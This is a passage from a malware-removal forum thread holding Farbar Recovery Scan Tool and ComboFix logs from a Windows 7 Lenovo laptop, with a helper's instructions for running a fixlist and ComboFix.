FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{42DE4584-70BA-4E32-9208-BB52CEFAF8DE}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{FB8C0C5A-06A1-4414-82C8-A7821A3B5E74}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{CF6F66CA-FA5A-4DE5-9371-B1E5BBA96B99}C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{AD29E40F-5D45-42B7-B0D0-3810BD85C2C0}C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{983A3230-DB8F-4BB0-A52D-D7F92FCD1297}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{D762B936-46C9-4444-9D73-3F1E92C71ED9}] => (Allow) C:\Users\User1\AppData\Local\Temp\nsi3B18.tmp\CnetInstaller-10863331.exe
FirewallRules: [{0F6B868C-F02D-48E0-A76B-79D7EB9CBB8B}] => (Allow) C:\Users\User1\AppData\Local\Temp\nsi3B18.tmp\CnetInstaller-10863331.exe
FirewallRules: [{BED21FF6-C104-473A-9A51-407AED9BEFDA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3B28AA31-4793-4D0C-AFE7-F8040AB55873}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{0435B6C1-EC17-4127-A73A-E81FD04CB7AB}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{5DB4D6BE-26D6-4C09-8B89-D3EBA46C1156}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) %systemroot%\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
FirewallRules: [{4EF3F7AD-A7B2-4069-AAF1-353C7166C049}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{68BBFCC5-0273-4777-B720-AD8E72BD0E7F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D195F671-4CFA-4140-AF86-B7A249934111}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B752D27C-F5CA-4F3B-B10D-CC6725B75B9E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A2FEE2C-8BCA-4702-9B1A-DF00432A5C01}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CB6AA92E-D768-44E3-AF67-4C5886584B07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A4B6CA1C-CBD0-4E35-802F-2870FEBD1178}] => (Allow) C:\Users\User1\Desktop\PDFCombine-74674127.exe
FirewallRules: [{FB1FBFA1-9AFE-4258-9238-DCE425D978DE}] => (Allow) C:\Users\User1\Desktop\PDFCombine-74674127.exe
FirewallRules: [{2D6C4B04-24D7-4BC6-BA5D-6EFEF6665EDF}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{FC9AD853-0C49-44CD-8BFA-DEA5E40BBF8C}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{1F29B9BD-0BAB-42F0-BE07-6DD64CCA36D3}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{FB3F4683-1893-4CAF-A532-7F512CEDE7B8}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D96E1F9A-376B-4FB1-9833-8D487727CE5D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{F634337A-61AF-40D9-9AC6-0292FE238503}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{22F79A5F-B099-4C99-B69C-E1983AF0D3DD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\OrganTrailDC\OrganTrail.exe
FirewallRules: [{C0CBC54B-BFB9-4080-87DF-A6CD673AA249}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\OrganTrailDC\OrganTrail.exe
FirewallRules: [{466D5510-402C-471F-84E8-ED30B8A8E300}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Bottom of the Well\bottomofthewell.exe
FirewallRules: [{C85B70F1-0897-49FB-B404-0A9C3870BA39}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Bottom of the Well\bottomofthewell.exe
FirewallRules: [{BEA5BFF0-4F23-44C4-98BD-494DFFC68210}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To Burn in Memory\nw.exe
FirewallRules: [{082C4761-312B-41DF-9068-0B6A88AEF097}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To Burn in Memory\nw.exe
FirewallRules: [{DCAF376F-DBC8-4E1A-874B-90ABA08AE260}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{E2C3EFF7-180C-4B20-B2D4-C7367215D577}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{9CCD6B1D-6502-487B-8CB6-2F3FD621C89D}] => (Allow) C:\Program Files (x86)\Brother\Brmfl13c\FAXRX.EXE
FirewallRules: [{E6C9A777-8E11-46EF-AC8E-DB85CEF0EFA4}] => (Allow) LPort=54925
FirewallRules: [{0F8890D9-395B-4C9D-B431-CF0CD6DEAE7A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Kings Bounty Crossworlds\KB.exe
FirewallRules: [{010D9204-B1D8-4F28-A068-28837E23851B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Kings Bounty Crossworlds\KB.exe
FirewallRules: [{48724F8F-179E-4C69-BD9C-F3F642951DE8}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{E4317D68-3C11-433C-AF1E-F93E0BBF7B35}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E4D8F78C-C93F-4D64-8D7D-460BACE2DCED}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe
FirewallRules: [{D6D3FE4D-B3C5-46DD-8405-A4739A15C9DC}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe

==================== Restore Points =========================

10-06-2016 02:59:39 Scheduled Checkpoint
19-06-2016 18:32:24 Scheduled Checkpoint
28-06-2016 01:56:26 Scheduled Checkpoint
04-07-2016 12:27:35 JRT Pre-Junkware Removal
04-07-2016 12:38:56 JRT Pre-Junkware Removal
04-07-2016 15:26:34 Restore Point Created by FRST

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/04/2016 03:32:06 PM) (Source: VmbService) (EventID: 0) (User: )
Description: GetProcessOwner

Error: (07/04/2016 03:32:06 PM) (Source: VmbService) (EventID: 0) (User: )
Description: GetProcessOwner

Error: (07/04/2016 03:29:47 PM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (07/04/2016 03:29:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/04/2016 03:27:33 PM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (07/04/2016 12:21:51 PM) (Source: VmbService) (EventID: 0) (User: )
Description: GetProcessOwner

Error: (07/04/2016 12:21:51 PM) (Source: VmbService) (EventID: 0) (User: )
Description: GetProcessOwner

Error: (07/04/2016 12:19:39 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/04/2016 12:19:38 PM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (07/04/2016 05:50:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1092


System errors:
=============
Error: (07/04/2016 03:30:47 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (07/04/2016 03:30:42 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)

Error: (07/04/2016 03:28:18 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\IWMSSvc.dll

Error: (07/04/2016 03:28:18 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\IWMSSvc.dll

Error: (07/04/2016 03:28:18 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\IWMSSvc.dll

Error: (07/04/2016 03:28:14 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\IWMSSvc.dll

Error: (07/04/2016 03:27:05 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056 = An instance of the service is already running.


Error: (07/04/2016 03:26:33 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Power Manager Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (07/04/2016 03:26:33 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (07/04/2016 03:26:33 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.


CodeIntegrity:
===================================
  Date: 2016-05-16 12:52:14.479
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-14 13:37:23.489
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-30 13:44:47.000
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-23 13:18:22.822
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-09-29 13:41:53.208
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-09-01 10:47:18.894
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-08-22 15:59:24.218
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-08-22 13:58:58.255
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-08-22 13:44:52.653
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-07-14 14:18:02.042
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ i5-3320M CPU @ 2.60GHz
Percentage of memory in use: 43%
Total physical RAM: 11984.8 MB
Available physical RAM: 6809.55 MB
Total Virtual: 23967.8 MB
Available Virtual: 18555.5 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:287.35 GB) (Free:41.24 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:6.12 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 4B3E34C6)
Partition 1: (Active) - (Size=1000 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=287.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


  • 0

#10
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
Download the enclosed =>Attached File  fixlist.txt   330bytes   61 downloads Save it in the location FRST64 is. Run FRST and click on the Fix button. Wait until finished.

The tool will make a log in the location FRST is, (Fixlog.txt). Please post it to your reply.

Next
Please run a scan with combofix

Combofix usuage guide
http://www.bleepingc...to-use-combofix

You can download Combofix from one of these links. I want you to save it to the desktop and run it from there.1. Close any open browsers or any other programs that are open.
2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall

Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." Please restart the computer

Please post the Log from Combofix
  • 0

Advertisements


#11
starsknight

starsknight

    Member

  • Topic Starter
  • Member
  • PipPip
  • 30 posts

Thanks! I've run the programs; here are the results:

Fix result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by User1 (2016-07-06 12:17:31) Run:2
Running from C:\Users\User1\Desktop\FRST64
Loaded Profiles: User1 (Available Profiles: User1 & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
FirewallRules: [{D762B936-46C9-4444-9D73-3F1E92C71ED9}] => (Allow) C:\Users\User1\AppData\Local\Temp\nsi3B18.tmp\CnetInstaller-10863331.exe
FirewallRules: [{0F6B868C-F02D-48E0-A76B-79D7EB9CBB8B}] => (Allow) C:\Users\User1\AppData\Local\Temp\nsi3B18.tmp\CnetInstaller-10863331.exe
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D762B936-46C9-4444-9D73-3F1E92C71ED9} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0F6B868C-F02D-48E0-A76B-79D7EB9CBB8B} => value removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17700511 B
Java, Flash, Steam htmlcache => 24340366 B
Windows/system/drivers => 1663757 B
Edge => 0 B
Chrome => 0 B
Firefox => 379325680 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 21844 B
User1 => 3047232 B
DefaultAppPool => 0 B

RecycleBin => 0 B
EmptyTemp: => 406.4 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 12:17:51 ====

ComboFix 16-06-30.01 - User1 07/06/2016  12:27:57.2.4 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.11985.8226 [GMT -5:00]
Running from: c:\users\User1\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Disabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((   Files Created from 2016-06-06 to 2016-07-06  )))))))))))))))))))))))))))))))
.
.
2016-07-06 17:39 . 2016-07-06 17:39    --------    d-----w-    c:\users\DefaultAppPool\AppData\Local\temp
2016-07-06 17:39 . 2016-07-06 17:39    --------    d-----w-    c:\users\Default\AppData\Local\temp
2016-07-06 16:32 . 2016-06-29 17:19    12007136    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{53101455-A63A-44EE-843E-F6056921DE00}\mpengine.dll
2016-07-05 11:50 . 2016-06-29 17:19    12007136    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2016-07-04 17:08 . 2016-07-04 17:17    --------    d-----w-    C:\AdwCleaner
2016-07-03 17:51 . 2016-07-06 17:19    --------    d-----w-    C:\FRST
2016-07-01 02:47 . 2016-05-09 17:10    1167568    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{C4B12F41-C539-45DE-A37D-2294AA73A478}\gapaengine.dll
2016-06-26 16:54 . 2016-06-26 16:54    --------    d-----w-    c:\program files (x86)\Common Files\Java
2016-06-20 20:16 . 2016-06-20 20:16    --------    d-----w-    c:\program files (x86)\RL-Software
2016-06-20 15:09 . 2016-06-20 15:09    --------    d-----w-    c:\users\User1\.QtWebEngineProcess
2016-06-20 15:09 . 2016-06-20 15:09    --------    d-----w-    c:\users\User1\.LSC
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-07-04 21:30 . 2014-05-31 05:42    192216    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-06-26 16:53 . 2014-12-22 23:33    97344    ----a-w-    c:\windows\SysWow64\WindowsAccessBridge-32.dll
2016-06-17 08:40 . 2014-05-24 23:43    796352    ----a-w-    c:\windows\SysWow64\FlashPlayerApp.exe
2016-06-17 08:40 . 2014-05-24 23:43    142528    ----a-w-    c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2016-05-09 17:10 . 2014-06-03 22:18    1167568    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2016-04-22 07:57 . 2010-11-21 03:27    453288    ------w-    c:\windows\system32\MpSigStub.exe
2016-04-14 11:08 . 2014-05-30 22:32    2692776    ------w-    c:\windows\PWMBTHLV.EXE
2016-04-14 11:08 . 2014-05-30 22:32    29512    ----a-w-    c:\windows\system32\drivers\DZHDD64.SYS
2016-04-14 11:08 . 2014-05-30 22:32    29008    ----a-w-    c:\windows\system32\drivers\TPPWR64V.SYS
2016-04-14 11:08 . 2014-05-30 22:32    2872488    ----a-w-    c:\windows\system32\PWMCP64V.cpl
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]
@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"
[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]
2012-04-09 22:27    158224    ----a-w-    c:\windows\SysWOW64\CbFsMntNtf3.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Steam"="c:\program files (x86)\Steam\steam.exe" [2016-06-15 2917456]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"RotateImage"="c:\program files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe" [2013-06-17 66560]
"USB3MON"="c:\program files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe" [2013-07-18 292088]
"Dolby Home Theater v4"="c:\program files (x86)\Dolby Home Theater v4\pcee4.exe" [2012-08-31 508656]
"PWMTRV"="c:\program files (x86)\ThinkPad\Utilities\PWMTR64V.DLL" [2016-04-14 6422696]
"IMSS"="c:\program files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe" [2013-12-03 134616]
"MobileBroadband"="c:\program files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe" [2011-04-19 408576]
"ControlCenter4"="c:\program files (x86)\ControlCenter4\BrCcBoot.exe" [2013-04-08 139264]
"BrStsMon00"="c:\program files (x86)\Browny02\Brother\BrStMonW.exe" [2013-03-22 4522496]
"BrHelp"="c:\program files (x86)\Brother\Brother Help\BrotherHelp.exe" [2013-03-07 1944576]
"Intuit SyncManager"="c:\program files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe" [2016-02-11 3792648]
"FwWordConverter"="c:\program files (x86)\RL-Software\FwWordConverter\complete.exe" [2016-06-20 210944]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2016-05-20 595992]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Amazon Unbox.lnk - c:\program files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe [2015-2-22 98304]
Bluetooth.lnk - c:\program files\ThinkPad\Bluetooth Software\BTTray.exe [2013-5-14 1395416]
Intuit Data Protect.lnk - c:\program files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe /Startup [2016-2-11 6306104]
QuickBooks Update Agent.lnk - c:\program files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe [2016-2-11 1226520]
QuickBooks_Standard_21.lnk - c:\program files (x86)\Intuit\QuickBooks 2016\QBW32.EXE -silent [2016-2-11 1539864]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages    REG_MULTI_SZ       scecli c:\program files\ThinkPad\Bluetooth Software\BtwProximityCP.dll c:\program files\ThinkVantage Fingerprint Software\psqlpwd.dll
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 BrYNSvc;BrYNSvc;c:\program files (x86)\Browny02\BrYNSvc.exe;c:\program files (x86)\Browny02\BrYNSvc.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 DozeSvc;Lenovo Doze Mode Service;c:\program files (x86)\ThinkPad\Utilities\DZSVC64.EXE;c:\program files (x86)\ThinkPad\Utilities\DZSVC64.EXE [x]
R3 ew_hwusbdev;Huawei MobileBroadband USB PNP Device;c:\windows\system32\DRIVERS\ew_hwusbdev.sys;c:\windows\SYSNATIVE\DRIVERS\ew_hwusbdev.sys [x]
R3 ew_usbenumfilter;huawei_CompositeFilter;c:\windows\system32\DRIVERS\ew_usbenumfilter.sys;c:\windows\SYSNATIVE\DRIVERS\ew_usbenumfilter.sys [x]
R3 huawei_cdcacm;huawei_cdcacm;c:\windows\system32\DRIVERS\ew_jucdcacm.sys;c:\windows\SYSNATIVE\DRIVERS\ew_jucdcacm.sys [x]
R3 huawei_ext_ctrl;huawei_ext_ctrl;c:\windows\system32\DRIVERS\ew_juextctrl.sys;c:\windows\SYSNATIVE\DRIVERS\ew_juextctrl.sys [x]
R3 huawei_wwanecm;huawei_wwanecm;c:\windows\system32\DRIVERS\ew_juwwanecm.sys;c:\windows\SYSNATIVE\DRIVERS\ew_juwwanecm.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 intaud_WaveExtensible;Intel WiDi Audio Device;c:\windows\system32\drivers\intelaud.sys;c:\windows\SYSNATIVE\drivers\intelaud.sys [x]
R3 Intel® Capability Licensing Service TCP IP Interface;Intel® Capability Licensing Service TCP IP Interface;c:\program files\Intel\iCLS Client\SocketHeciServer.exe;c:\program files\Intel\iCLS Client\SocketHeciServer.exe [x]
R3 LSC.Services.SystemService;Lenovo Solution Center System Service;c:\program files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe;c:\program files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [x]
R3 LVRS64;Logitech RightSound Filter Driver;c:\windows\system32\DRIVERS\lvrs64.sys;c:\windows\SYSNATIVE\DRIVERS\lvrs64.sys [x]
R3 LVUVC64;Logitech Webcam C210(UVC);c:\windows\system32\DRIVERS\lvuvc64.sys;c:\windows\SYSNATIVE\DRIVERS\lvuvc64.sys [x]
R3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 ShareItSvc;ShareItSvc;c:\program files (x86)\Lenovo\SHAREit\Shareit.Service.exe;c:\program files (x86)\Lenovo\SHAREit\Shareit.Service.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys;c:\windows\SYSNATIVE\DRIVERS\wdcsam64.sys [x]
R3 WSDScan;WSD Scan Support via UMB;c:\windows\system32\DRIVERS\WSDScan.sys;c:\windows\SYSNATIVE\DRIVERS\WSDScan.sys [x]
S0 DzHDD64;DzHDD64;c:\windows\System32\DRIVERS\DzHDD64.sys;c:\windows\SYSNATIVE\DRIVERS\DzHDD64.sys [x]
S0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;c:\windows\system32\DRIVERS\iusb3hcs.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hcs.sys [x]
S0 TPDIGIMN;TPDIGIMN;c:\windows\System32\DRIVERS\ApsHM64.sys;c:\windows\SYSNATIVE\DRIVERS\ApsHM64.sys [x]
S2 Apple Mobile Device Service;Apple Mobile Device Service;c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe;c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [x]
S2 FoxitCloudUpdateService;Foxit Cloud Safe Update Service;c:\program files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe;c:\program files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe [x]
S2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;c:\program files\Intel\iCLS Client\HeciServer.exe;c:\program files\Intel\iCLS Client\HeciServer.exe [x]
S2 jhi_service;Intel® Dynamic Application Loader Host Interface Service;c:\program files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [x]
S2 LENOVO.CAMMUTE;Lenovo Camera Mute;c:\program files\Lenovo\Communications Utility\CAMMUTE.exe;c:\program files\Lenovo\Communications Utility\CAMMUTE.exe [x]
